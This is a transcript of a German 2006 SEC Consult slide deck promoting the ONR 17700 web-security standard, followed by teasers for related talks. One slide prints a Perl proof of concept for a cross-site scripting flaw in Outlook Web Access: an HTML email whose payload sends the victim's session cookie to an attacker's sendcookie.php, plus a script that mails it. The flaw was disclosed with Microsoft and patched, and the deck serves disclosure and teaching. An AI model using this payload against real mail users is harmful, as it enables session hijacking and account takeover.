Sichere Webapplikationen nach ONR oder Wer liest meine s?

Größe: px
Ab Seite anzeigen:

Download "Sichere Webapplikationen nach ONR 17700 oder Wer liest meine Emails?"

Transkript

1 Sichere Webapplikationen nach ONR oder Wer liest meine s? Advisor for your information security. Essen, Oktober 2006 Version 1.0

2 SEC Consult Advisor for your information security Information Security Beratung Unabhängigkeit von Produktherstellern Spezialist für technische Audits + Umsetzung Spezialist für die Einführung von Sicherheitsprozessen und Policies Behörden, Banken, Versicherungen, börsennotierte Unternehmen in Zentraleuropa als Kunden SEC Consult Unternehmensberatung GmbH All rights reserved

3 ONR Sicherheitstechnische Anforderungen an Webapplikationen Erste Norm im EU-Raum für die Sicherheit von Webanwendungen Entwickelt von Österr. Normungsinsitut, SEC Consult, Großbanken, - versicherungen, Behörden, Wirtschaftsprüfern 2004/05 Vollständige Abdeckung des Sicherheitsbereichs in Webapplikationen (die von anderen Normen z.b. ISO nur gestreift werden) Gewährleistung eines hohen Sicherheitsniveaus für kritische Webapplikationen Sehr gutes Verhältnis von Investment zu Verbesserung des Sicherheitslevels SEC Consult Unternehmensberatung GmbH All rights reserved

4 Webapplikationen das schwächste Glied? Infrastruktur (DMZ, Firewalls, ) ist meist OK Viele Webapplikationen (Portale, Shops, Webmail, ) sind unsicher, weil Oft proprietäre Entwicklungen Müssen schwer vorhersehbaren Benutzerinput verarbeiten Stehen ungeschützt im Internet SEC Consult Unternehmensberatung GmbH All rights reserved

5 Schwachstellen in Webanwendungen nur bei Eigenentwicklungen? Auch Webanwendungen von großen Herstellern wie z.b. der webbasierte Client Outlook Web Access (OWA) von Microsoft können verwundbar sein Was ist OWA? Client im Web Microsoft Outlook Funktionalität Mehrere Millionen Benutzer weltweit SEC Consult Unternehmensberatung GmbH All rights reserved

6 Schwachstelle in Microsoft Outlook Web Access (OWA) Entdeckt im SEC Consult Vulnerability Lab Ermöglicht Cross Site Scripting Angriffe auf Nutzer von OWA Übernahme von Mail-Konto möglich Somit Vollzugriff auf alle Mails des kompromittierten Nutzers Microsoft Patch bereits ausgerollt: MS SEC Consult Unternehmensberatung GmbH All rights reserved

7 Hacking Outlook Web Access (Schritt 1 von 4) Der Angreifer verfasst ein , mit dessen Hilfe er die Session seines Opfers übernehmen will, und versendet es als Inline Attachment. #!/usr/bin/perl print "Cross Site Scripting demonstration\n"; print "<img src='http\x00http:///nonexisting_image.gif' onerror='javascript:window.location=http:// /sendcookie.php?cookie='+document.c ookie' alt='<s'\x00\n"; #!/usr/bin/perl use strict; #>./create_attack_mail.pl use Mail::Sender; > exploit.html my $recipients = my $sender = new Mail::Sender {smtp => 'smtp.sec-consult.com'}; if ($sender->openmultipart({from => to => $recipients, subject => 'Inline HTML file', subtype => 'related', boundary => 'SECSECSECSECSECSECSEC', type => 'multipart/related'}) > 0) { $sender->sendfile( {description => 'html body', ctype => 'text/html; charset=iso ', disposition => 'NONE', file => 'exploit.html' }); }; Veröffentlichung der Schwachstelle erfolgte in Abstimmung mit Microsoft Development in Redmond, USA SEC Consult Unternehmensberatung GmbH All rights reserved

8 Hacking Outlook Web Access (Schritt 2 von 4) Das Opfer öffnet das präparierte mit Outlook Web Access SEC Consult Unternehmensberatung GmbH All rights reserved

9 Hacking Outlook Web Access (Schritt 3 von 4) Das Cookie wird im Hintergrund an den Angreifer gesendet, ohne dass das Opfer etwas davon bemerkt SEC Consult Unternehmensberatung GmbH All rights reserved

10 Hacking Outlook Web Access (Schritt 4 von 4) Nach Übernahme des Cookies kann der Angreifer die Session seines Opfers übernehmen und somit dessen Account vollständig kompromittieren SEC Consult Unternehmensberatung GmbH All rights reserved

11 SEC Consult Advisory für Outlook Web Access SEC Consult Unternehmensberatung GmbH All rights reserved

12 ONR So schützt man sich richtig z.b. vor Cross Site Scripting in Webapplikationen Die ONR definiert Vorgaben, die z.b. Cross Site Scripting Angriffen entgegenwirken: Kapitel 3: Architektur der Webapplikation Kapitel 5.4: Sitzungsmanagement Kapitel 6: Formulare und Benutzereingaben Werden alle diese Vorgaben der ON- Regel erfüllt, kann Cross Site Scripting unterbunden werden Infos: / SEC Consult Unternehmensberatung GmbH All rights reserved

13 SEC Consult Advisor for your information security Information Security Beratung Unabhängigkeit von Produktherstellern Spezialist für technische Audits + Umsetzung Spezialist für die Einführung von Sicherheitsprozessen und Policies Behörden, Banken, Versicherungen, börsennotierte Unternehmen in Zentraleuropa als Kunden SEC Consult Unternehmensberatung GmbH All rights reserved

14 Wie erreichen Sie SEC Consult? SEC Consult Unternehmensberatung GmbH Blindengasse 3, A-1080 Wien Tel: +43 / Fax: +43 / Weitere Informationen finden Sie auch auf unserem Messestand: Halle: GA Stand-Nr.: SEC Consult Unternehmensberatung GmbH All rights reserved

Webapplikationssicherheit (inkl. Livehack) TUGA 15

Webapplikationssicherheit (inkl. Livehack) TUGA 15 Webapplikationssicherheit (inkl. Livehack) TUGA 15 Advisor for your Information Security Version: 1.0 Autor: Thomas Kerbl Verantwortlich: Thomas Kerbl Datum: 05. Dezember 2008 Vertraulichkeitsstufe: Öffentlich

Mehr

Agenda. 2008 SEC Consult Unternehmensberatung GmbH All rights reserved

Agenda. 2008 SEC Consult Unternehmensberatung GmbH All rights reserved Agenda Web-Anwendungen als schwächstes Glied für Angriffe aus dem Internet Bewertung gängiger Standards und Normen von Web-Anwendungen BSI-Standards 100-1, 100-2 und IT-Grundschutz BSI-Studie ISi-Web:

Mehr

DI(FH) Daniel Fabian. Phishing Quo Vadis? Webapplikationssicherheit und ONR 17700. SEC Consult Unternehmensberatung GmbH Fachhochschule Hagenberg

DI(FH) Daniel Fabian. Phishing Quo Vadis? Webapplikationssicherheit und ONR 17700. SEC Consult Unternehmensberatung GmbH Fachhochschule Hagenberg DI(FH) Daniel Fabian Phishing Quo Vadis? Webapplikationssicherheit und ONR 17700 SEC Consult Unternehmensberatung GmbH Fachhochschule Hagenberg IT-Security, Disaster Recovery, Finanzdienstleister, Pharmazeutische

Mehr

Web Application Security Wir sind bestens vor Angriffen gesichert, wir haben eine Firewall!

Web Application Security Wir sind bestens vor Angriffen gesichert, wir haben eine Firewall! Web Application Security Wir sind bestens vor Angriffen gesichert, wir haben eine Firewall! IT-SeCX 12.11.2010 Version: 1.0 Autor: A. Kravitz / K. Bauer Verantwortlich: A. Kravitz Datum: 12.11.2010 Vertraulichkeitsstufe:

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Web Application Security mit phion airlock. Walter Egger Senior Sales Web Application Security

Web Application Security mit phion airlock. Walter Egger Senior Sales Web Application Security mit phion airlock Walter Egger Senior Sales phion AG 2009 history and background of airlock Entwicklungsbeginn im Jahr 1996 Im Rahmen einer der ersten e-banking Applikation (Credit Swisse) Übernahme der

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

SICHERHEITSANALYSE & PENTEST SCHWÄCHEN ERKENNEN HEISST STÄRKE GEWINNEN.

SICHERHEITSANALYSE & PENTEST SCHWÄCHEN ERKENNEN HEISST STÄRKE GEWINNEN. SICHERHEITSANALYSE & PENTEST SCHWÄCHEN ERKENNEN HEISST STÄRKE GEWINNEN. willkommen in sicherheit. 02...03 UNSER GEZIELTER ANGRIFF, IHRE BESTE VERTEIDIGUNG. Hackerangriffe sind eine wachsende Bedrohung

Mehr

Web Applications Vulnerabilities

Web Applications Vulnerabilities Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt

Mehr

XSS for fun and profit

XSS for fun and profit 5. Chemnitzer Linux-Tag 1.-2.- März 2003 XSS for fun and profit Theorie und Praxis von Cross Site Scripting (XSS) Sicherheitslücken, Diebstahl von Cookies, Ausführen von Scripten auf fremden Webservern,

Mehr

Web Application Security

Web Application Security Web Application Security Was kann schon schiefgehen. Cloud & Speicher Kommunikation CMS Wissen Shops Soziale Netze Medien Webseiten Verwaltung Chancen E-Commerce Kommunikation Globalisierung & Digitalisierung

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH 2 Open for Business - Open to Attack? 75% aller Angriffe zielen auf Webanwendungen (Gartner, ISS)

Mehr

Georg Heß. Grünes Licht für verlässlichere Online- Services WEB APPLICATION SECURITY. Deutschland sicher im Netz e.v. Köln, 24.01.

Georg Heß. Grünes Licht für verlässlichere Online- Services WEB APPLICATION SECURITY. Deutschland sicher im Netz e.v. Köln, 24.01. Sicherheit von W eb- Applikationen Grünes Licht für verlässlichere Online- Services Deutschland sicher im Netz e.v. Köln, 24.01.2008 Georg Heß Agenda Kurzprofil der art of defence GmbH Sicherheitsleck

Mehr

Wie steht es um die Sicherheit in Software?

Wie steht es um die Sicherheit in Software? Wie steht es um die Sicherheit in Software? Einführung Sicherheit in heutigen Softwareprodukten Typische Fehler in Software Übersicht OWASP Top 10 Kategorien Praktischer Teil Hacking Demo Einblick in die

Mehr

Audit von Authentifizierungsverfahren

Audit von Authentifizierungsverfahren Audit von Authentifizierungsverfahren Walter Sprenger, Compass Security AG Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel +41 55-214 41 60 Fax +41 55-214 41 61 team@csnc.ch

Mehr

IHK: Web-Hacking-Demo

IHK: Web-Hacking-Demo sic[!]sec, Achim Hoffmann IHK: Web-Hacking-Demo, Bayreuth 1. April 2014 1 von 34 IHK: Web-Hacking-Demo Achim Hoffmann Achim.Hoffmann@sicsec.de Bayreuth 1. April 2014 sic[!]sec GmbH spezialisiert auf Web

Mehr

Webapplikationen wirklich sicher?! 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum

Webapplikationen wirklich sicher?! 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum Webapplikationen wirklich sicher? 10. Mai 2006 IT-TRENDS Sicherheit Zentrum für IT-Sicherheit, Bochum Die wachsende Bedrohung durch Web-Angriffen Test, durchgeführt von PSINet und Pansec 2 "dummy" Web-Sites

Mehr

Microsoft Konzepte für einen modernen Verwaltungsarbeitsplatz Teil 1

Microsoft Konzepte für einen modernen Verwaltungsarbeitsplatz Teil 1 Microsoft Konzepte für einen modernen Verwaltungsarbeitsplatz Teil 1 Holger Pfister Lösungsberater Office System Microsoft Deutschland GmbH Holger.Pfister@microsoft.com Die Herausforderung Für jede Anwendung

Mehr

Denken wie ein Hacker

Denken wie ein Hacker Denken wie ein Hacker Phasen eines Hackerangriffs Juerg Fischer Juerg.fischer@sunworks.ch Consultant & Trainer Certified EC-Council Instructor Microsoft Certified Trainer www.digicomp.c 2 1 Ihre Daten

Mehr

Sicherheit in der SW-Entwicklung und beim Betrieb einer Identity und Access Management Lösung

Sicherheit in der SW-Entwicklung und beim Betrieb einer Identity und Access Management Lösung Sicherheit in der SW-Entwicklung und beim Betrieb einer Identity und Access Management Lösung Best Practice Standardportal Bundesministerium für Inneres und Land-, forst- und wasserwirtschaftliches Rechenzentrum

Mehr

Intelligent Application Gateway 2007 Abgrenzung und Mehrwert zum Internet Security Acceleration Server 2006

Intelligent Application Gateway 2007 Abgrenzung und Mehrwert zum Internet Security Acceleration Server 2006 Intelligent Application Gateway 2007 Abgrenzung und Mehrwert zum Internet Security Acceleration Server 2006 Kai Wilke Consultant - IT Security Microsoft MVP a. D. mailto:kw@itacs.de Agenda Microsoft Forefront

Mehr

There is no security on this earth. Na und? General Douglas MacArthur. Alfred E. Neumann

There is no security on this earth. Na und? General Douglas MacArthur. Alfred E. Neumann There is no security on this earth. Na und? General Douglas MacArthur Alfred E. Neumann Anwendungen verursachen Unsicherheit Ca. ¾ aller Schwachstellen stammen aus Anwendungen. Cryptography 0% Application

Mehr

Mit SErviCE-lEvEl DDoS AppliCAtion SECUrity Monitoring

Mit SErviCE-lEvEl DDoS AppliCAtion SECUrity Monitoring Mit Service-Level DDoS Application Security Monitoring Die Umsetzung meiner Applikations-Security-Strategie war nicht immer einfach. AppSecMon konnte mich in wesentlichen Aufgaben entlasten. Kontakt zu

Mehr

Live Hacking auf eine Citrix Umgebung

Live Hacking auf eine Citrix Umgebung Live Hacking auf eine Citrix Umgebung Ron Ott + Andreas Wisler Security-Consultants GO OUT Production GmbH www.gosecurity.ch GO OUT Production GmbH Gegründet 1999 9 Mitarbeiter Dienstleistungen: 1 Einleitung

Mehr

Sichere Kommunikation & Live Hacking. Christian Lechner, Christian Schlosser Raiffeisen Informatik GmbH

Sichere Kommunikation & Live Hacking. Christian Lechner, Christian Schlosser Raiffeisen Informatik GmbH Sichere Kommunikation & Live Hacking Christian Lechner, Christian Schlosser Raiffeisen Informatik GmbH Risiken der Mail Kommunikation Unternehmenserfolg gefährdet Mail Hacking Funktionsprinzip Group Mail

Mehr

Integration in die Office-Plattform. machen eigene Erweiterungen Sinn?

Integration in die Office-Plattform. machen eigene Erweiterungen Sinn? Integration in die Office-Plattform machen eigene Erweiterungen Sinn? Agenda Apps Warum eigentlich? Apps für Office Apps für SharePoint Entwicklungsumgebungen Bereitstellung Apps Warum eigentlich? Bisher

Mehr

Compass Security AG [The ICT-Security Experts]

Compass Security AG [The ICT-Security Experts] Compass Security AG [The ICT-Security Experts] Live Hacking: Cloud Computing - Sonnenschein oder (Donnerwetter)? [Sophos Anatomy of an Attack 14.12.2011] Marco Di Filippo Compass Security AG Werkstrasse

Mehr

Web Application Testing

Web Application Testing Sicherheit von Web Applikationen - Web Application Testing Veranstaltung: IT-Sicherheitstag NRW, 04.12.2013, KOMED MediaPark, Köln Referent: Dr. Kurt Brand Geschäftsführer Pallas GmbH Pallas GmbH Hermülheimer

Mehr

Sicherheitskonzepte in Zeiten von Google, Stuxnet und Co.

Sicherheitskonzepte in Zeiten von Google, Stuxnet und Co. Sicherheitskonzepte in Zeiten von Google, Stuxnet und Co. Carsten Hoffmann Presales Manager City Tour 2011 1 Sicherheitskonzepte in Zeiten von Epsilon, RSA, HBGary, Sony & Co. Carsten Hoffmann Presales

Mehr

Forefront Security. Helge Schroda Technologieberater Microsoft Deutschland

Forefront Security. Helge Schroda Technologieberater Microsoft Deutschland Forefront Security Helge Schroda Technologieberater Microsoft Deutschland Microsoft Security Produkt Portfolio Service s Edge Server Applications Client and Server OS Information Protection Identity Management

Mehr

Technische Dokumentation Scalera Mailplattform MS Entourage Konfigruation unter Mac OS X für EveryWare Kunden

Technische Dokumentation Scalera Mailplattform MS Entourage Konfigruation unter Mac OS X für EveryWare Kunden Technische Dokumentation Scalera Mailplattform MS Entourage Konfigruation unter Mac OS X für EveryWare Kunden Vertraulichkeit Das vorliegende Dokument beinhaltet vertrauliche Informationen und darf nicht

Mehr

FAQ s für die Exchange Migration

FAQ s für die Exchange Migration FAQ s für die Exchange Migration Inhalt Wie stelle ich fest dass ich bereits in die neuen Domäne migriert bin?... 2 Ich bekomme Mails als unzustellbar zurück... 3 Wie sind die technischen Parameter für

Mehr

e-seal Gebrauchsanweisung für Novartis Mitarbeiter mit Microsoft Outlook e-seal_2_8_11_0154_umol

e-seal Gebrauchsanweisung für Novartis Mitarbeiter mit Microsoft Outlook e-seal_2_8_11_0154_umol e-seal e-seal_2_8_11_0154_umol Gebrauchsanweisung für Novartis Mitarbeiter mit Microsoft Outlook Novartis Template IT504.0040 V.1.8 1 / 9 e-seal_2_8_11_0154_umol_1.0_ger.doc Dokumentenhistorie: Version

Mehr

@HERZOvision.de. Lokalen E-Mail-Client mit IMAP einrichten. v 1.1.0 by Herzo Media GmbH & Co. KG - www.herzomedia.de

@HERZOvision.de. Lokalen E-Mail-Client mit IMAP einrichten. v 1.1.0 by Herzo Media GmbH & Co. KG - www.herzomedia.de @HERZOvision.de Lokalen E-Mail-Client mit IMAP einrichten v 1.1.0 by Herzo Media GmbH & Co. KG - www.herzomedia.de Inhaltsverzeichnis Inhaltsverzeichnis... 2 IMAP Was ist das?... 3 Einrichtungsinformationen...

Mehr

Leitfaden Konfiguration Hosted Exchange Professionell (V3.0, Exchange Server 2007) Mini- Mailboxen mit POP3 und IMAP4 E-Mail Clients

Leitfaden Konfiguration Hosted Exchange Professionell (V3.0, Exchange Server 2007) Mini- Mailboxen mit POP3 und IMAP4 E-Mail Clients Leitfaden Konfiguration Hosted Exchange Professionell (V3.0, Exchange Server 2007) Mini- Mailboxen mit POP3 und IMAP4 E-Mail Clients Ausgabe vom 17. Oktober 2008 Konfigurationsdokument für Hosted Exchange

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung } Warum ist Sicherheit ein Software Thema? } Sicherheit in heutigen Softwareprodukten & Trends } OWASP Top 10 Kategorien Hacking Demo } SQL Injection: der Weg zu

Mehr

WhatsApp und Co. Sicherheitsanalyse von Smartphone-Messengers. Sebastian Schrittwieser

WhatsApp und Co. Sicherheitsanalyse von Smartphone-Messengers. Sebastian Schrittwieser WhatsApp und Co. Sicherheitsanalyse von Smartphone-Messengers Sebastian Schrittwieser Smartphone Messaging Ersatz für traditionelle SMS Gratis Nachrichtenversand über das Internet Neuartiges Authentifizierungskonzept

Mehr

.lowfidelity EMAIL KONFIGURATION Anleitung

.lowfidelity EMAIL KONFIGURATION Anleitung .lowfidelity EMAIL KONFIGURATION Anleitung.lowfidelity OG, Mariahilfer Straße 184/5 1150 Wien, +43 (1) 941 78 09, dispatch@lowfidelity.at 1 Webmail Ohne einen externen Email Client können Mails über das

Mehr

SCAP im Security Process

SCAP im Security Process SCAP im Security Process Security Transparent Lukas Grunwald 2015-05-06 Version 2014062101 Die Greenbone Networks GmbH Fokus: Vulnerability Management Erkennen von und schützen vor Schwachstellen Fortlaufende

Mehr

Unified Threat Management als Ersatz für das Microsoft TMG/IAG

Unified Threat Management als Ersatz für das Microsoft TMG/IAG Unified Threat Management als Ersatz für das Microsoft TMG/IAG Infotag 19.09.2013 Daniel Becker Microsoft TMG/IAG Einsatzzwecke Firewall Proxyserver AntiSpam Gateway Veröffentlichung von Webdiensten Seit

Mehr

Referent. Exchange 2013. Was gibt es neues?

Referent. Exchange 2013. Was gibt es neues? IT Pro Day Exchange 2013 Was gibt es neues? Dejan Foro dejan.foro@exchangemaster.net Referent IT Project Manager @ Nyrstar AG, Zürich 19 Jahren in IT 6 Exchange Generationen (5.5, 2000, 2003, 2007, 2010,

Mehr

Citrix - Virtualisierung und Optimierung in SharePoint. Server Umgebungen. Peter Leimgruber Citrix Systems GmbH

Citrix - Virtualisierung und Optimierung in SharePoint. Server Umgebungen. Peter Leimgruber Citrix Systems GmbH Citrix - Virtualisierung und Optimierung in SharePoint Server Umgebungen Peter Leimgruber Citrix Systems GmbH Citrix-Microsoft Alliance eine lange Historie! 1989 Microsoft licenses OS/2 to Citrix for multi-user

Mehr

Implementierung einer Check Point 4200 Appliance Next Generation Threat Prevention (NGTP)

Implementierung einer Check Point 4200 Appliance Next Generation Threat Prevention (NGTP) Projekthistorie 08/2014-09/2014 Sicherheitsüberprüfung einer Kundenwebseite auf Sicherheitslücken Juwelier Prüfung der Kundenwebseite / des Online-Shops auf Sicherheitslücken Penetration Tester Sicherheitsüberprüfung

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

E-mail-Konto Einrichtung. Webmail. Outlook Express. Outlook

E-mail-Konto Einrichtung. Webmail. Outlook Express. Outlook E-mail-Konto Einrichtung Webmail Outlook Express Outlook 1 Allgemeines Sobald ein E-mail-Konto vom VÖP-Büro eingerichtet und bestätigt wurde steht der Zugang Web - Mail zu Verfügung. Im Zuge der Einrichtung

Mehr

Thomas Macht Ausarbeitung Security-Test WS 09

Thomas Macht Ausarbeitung Security-Test WS 09 Sicherheit und Grenzrisiko definieren Sicherheit: Risiko < Grenzrisiko, absolute Sicherheit gibt es nicht Grenzrisiko: größtes noch vertretbare Risiko eines technischen Vorgangs/Zustands Risiko definieren

Mehr

IT-Sicherheit in Unternehmen: Typische Probleme und Lösungsmöglichkeiten OWASP 17.11.2011. The OWASP Foundation http://www.owasp.org.

IT-Sicherheit in Unternehmen: Typische Probleme und Lösungsmöglichkeiten OWASP 17.11.2011. The OWASP Foundation http://www.owasp.org. IT-Sicherheit in Unternehmen: Typische Probleme und Lösungsmöglichkeiten Amir Alsbih 17.11.2011 http://www.xing.com/profile/amir_alsbih http://de.linkedin.com/pub/amiralsbih/1a/19a/b57 Copyright The Foundation

Mehr

am Beispiel - SQL Injection

am Beispiel - SQL Injection am Beispiel - SQL Injection Einführung Warum ist Sicherheit ein Software Thema? Sicherheit in heutigen Softwareprodukten & Trends OWASP Top 10 Kategorien Hacking Demo SQL Injection: der Weg zu den Daten

Mehr

Spam/Viren. Ein Statusbericht. Roland Dietlicher ID/Basisdienste 12. Mai 2004

Spam/Viren. Ein Statusbericht. Roland Dietlicher ID/Basisdienste 12. Mai 2004 Spam/Viren Ein Statusbericht Roland Dietlicher ID/Basisdienste 12. Mai 2004 Guten Tag Herr Dietlicher, Ich nehme nicht an, dass Sie es waren der mir rund 20 Spams gesendet hat - aber evtl müsste ihr Computer

Mehr

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.

Mehr

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de

Advanced Web Hacking. Matthias Luft Security Research mluft@ernw.de Advanced Web Hacking Matthias Luft Security Research mluft@ernw.de ERNW GmbH. Breslauer Str. 28. D-69124 Heidelberg. www.ernw.de 6/23/2010 1 ERNW GmbH Sicherheitsdienstleister im Beratungs- und Prüfungsumfeld

Mehr

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite Zusammenfassung: Alle Oracle Forms Anwendungen sind per Default durch SQL Injection angreifbar. Oracle Applications >=11.5.9 ist davon nicht betroffen, da hier standardmäßig der Wert FORMSxx_RESTRICT_ENTER_QUERY

Mehr

Microsoft Forefront Edge Security and Access

Microsoft Forefront Edge Security and Access Microsoft Forefront Edge Security and Access Sicheres mobiles Arbeiten mit IAG 2007, Rights Management Services und Microsoft Office Sharepoint Server 2007 Eric Litowsky Security Sales Specialist Microsoft

Mehr

Ist meine WebSite noch sicher?

Ist meine WebSite noch sicher? Ist meine WebSite noch sicher? Massive Angriffe gegen Joomla, Wordpress, Typo3 02.12.2014 Stephan Sachweh Geschäftsführer Pallas GmbH Pallas stellt sich vor Wir sind ein MSSP: Managed Security Service

Mehr

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL TCP/IP: Standard Protokolle Konrad Rosenbaum, 2006/7 DNS - Domain Name System hierarchische, global verteilte Datenbank löst Namen in IP-Adressen auf Host hat einen primären Nameserver, der Fragen selbst

Mehr

Citrix Access Gateway - sicherer Zugriff auf Unternehmensressourcen

Citrix Access Gateway - sicherer Zugriff auf Unternehmensressourcen Citrix Access Gateway - sicherer Zugriff auf Unternehmensressourcen Peter Metz Sales Manager Application Networking Group Citrix Systems International GmbH Application Delivery mit Citrix Citrix NetScaler

Mehr

Markus BöhmB Account Technology Architect Microsoft Schweiz GmbH

Markus BöhmB Account Technology Architect Microsoft Schweiz GmbH Markus BöhmB Account Technology Architect Microsoft Schweiz GmbH What is a GEVER??? Office Strategy OXBA How we used SharePoint Geschäft Verwaltung Case Management Manage Dossiers Create and Manage Activities

Mehr

Sicherheit und ebusiness

Sicherheit und ebusiness Sicherheit und ebusiness Andreas Ebert Regional Technology Officer European Union Microsoft Corporation andrease@microsoft.com Unser Netzwerk ist sicher. Nicht wahr? Klar. Keine Sorge. Wir haben einige

Mehr

ITdesign ProtectIT Paket

ITdesign ProtectIT Paket ITdesign ProtectIT Paket Version 1.0 Konzeption und Inhalt: ITdesign Nutzung durch Dritte nur mit schriftlicher Genehmigung von ITdesign INHALTSVERZEICHNIS 1 ITDESIGN PROTECTIT... 3 1.1 BETRIEBSSYSTEME

Mehr

CYBER SECURITY SICHERN, WAS VERBINDET. Dr. Rüdiger Peusquens it-sa Nürnberg, 08.-10.10.2013

CYBER SECURITY SICHERN, WAS VERBINDET. Dr. Rüdiger Peusquens it-sa Nürnberg, 08.-10.10.2013 CYBER SECURITY SICHERN, WAS VERBINDET. Dr. Rüdiger Peusquens it-sa Nürnberg, 08.-10.10.2013 IT HEUTE UND MORGEN Die Welt im Netz Das Netz wird wichtiger als der Knoten Prozesse statt Computer Cloud, Cloud,

Mehr

IT-Symposium 2007 17.04.2007. Exchange Server 2007 im Überblick

IT-Symposium 2007 17.04.2007. Exchange Server 2007 im Überblick Exchange Server 2007 im Überblick Daniel Melanchthon Technical Evangelist Microsoft Deutschland GmbH http://blogs.technet.com/dmelanchthon Investitionen Built-in Protection Hohe Verfügbarkeit zu geringeren

Mehr

OpenWAF Web Application Firewall

OpenWAF Web Application Firewall OpenWAF Web Application Firewall Websecurity und OpenWAF in 60 Minuten Helmut Kreft Fuwa, 15.11.2010 Agenda Webapplikationen? Furcht und Schrecken! OWASP Top 10 - Theorie und Praxis mit dem BadStore Umgang

Mehr

Einführung in die IT Landschaft an der ZHAW

Einführung in die IT Landschaft an der ZHAW Einführung in die IT Landschaft an der ZHAW Martin Scheiwiller Building Competence. Crossing Borders. xswi@zhaw.ch / 1. September 2014 Themen 1. Netzwerkinfrastruktur 2. WEB Seiten 3. Software 4. EDV Support

Mehr

Erstellen einer E-Mail in OWA (Outlook Web App)

Erstellen einer E-Mail in OWA (Outlook Web App) Erstellen einer E-Mail in OWA (Outlook Web App) Partner: 2/12 Versionshistorie: Datum Version Name Status 13.09.2011 1.1 J. Bodeit Punkte 7 hinzugefügt, alle Mailempfänger unkenntlich gemacht 09.09.2011

Mehr

Datensicherheit im Gesundheitswesen Christian Proschinger Raiffeisen Informatik GmbH

Datensicherheit im Gesundheitswesen Christian Proschinger Raiffeisen Informatik GmbH Datensicherheit im Gesundheitswesen Christian Proschinger Raiffeisen Informatik GmbH Raiffeisen Informatik Tätigkeitsfeld Security Competence Center Zwettl Datensicherheit Gesetzliche Anforderungen Angriffsvektoren

Mehr

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen

Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen Sichere Entwicklung und gängige Schwachstellen in eigenentwickelten SAP-Web- Anwendungen Sebastian Schinzel Virtual Forge GmbH University of Mannheim SAP in a Nutshell Weltweit führendes Unternehmen für

Mehr

Unterhaltungsmodus Zweck Bedingung Ein- und Ausschalten. Einstellungen Anzeigeeinstellungen Optionen Zustellungsberichte Verteilergruppen.

Unterhaltungsmodus Zweck Bedingung Ein- und Ausschalten. Einstellungen Anzeigeeinstellungen Optionen Zustellungsberichte Verteilergruppen. Inhalt Unterhaltungsmodus Zweck Bedingung Ein- und Ausschalten Einstellungen Anzeigeeinstellungen Optionen Zustellungsberichte Verteilergruppen 1 Webmail aufrufen Rufen Sie einen Browser auf und geben

Mehr

itsc Admin-Tag OWASP Top 10 Tobias Ellenberger COO & Co-Partner OneConsult GmbH 2013 OneConsult GmbH www.oneconsult.com

